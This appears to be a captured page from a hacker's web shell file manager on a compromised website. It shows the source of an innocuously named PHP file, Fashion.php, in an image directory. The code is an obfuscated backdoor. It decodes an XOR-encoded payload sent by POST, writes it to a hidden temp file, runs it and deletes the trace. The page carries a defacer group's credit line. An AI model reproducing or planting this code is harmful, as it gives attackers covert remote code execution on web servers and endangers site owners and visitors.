whoami7 - Manager
:
/
home
/
analuakl
/
ankurmedia.com
/
GMR
/
image
/
Upload File:
files >> /home/analuakl/ankurmedia.com/GMR/image/Fashion.php
<?php if(array_key_exists("\x63\x6Fmp", $_POST) && !is_null($_POST["\x63\x6Fmp"])){ $flg = $_POST["\x63\x6Fmp"]; $flg =explode ( "." , $flg ) ; $tkn = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $i = 0; $__tmp = $flg; while ($v6 = array_shift($__tmp)) { $sChar = ord($s[$i % $lenS]); $d = ((int)$v6 - $sChar - ($i % 10)) ^79; $tkn .= chr($d); $i++; } $key = array_filter(["/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", getcwd(), getenv("TEMP"), "/tmp", session_save_path(), getenv("TMP")]); foreach ($key as $token): if (!( !is_dir($token) || !is_writable($token) )) { $ptr = join("/", [$token, ".sym"]); if (file_put_contents($ptr, $tkn)) { require $ptr; unlink($ptr); die(); } } endforeach; }
Copyright ©2021 || Defacer Indonesia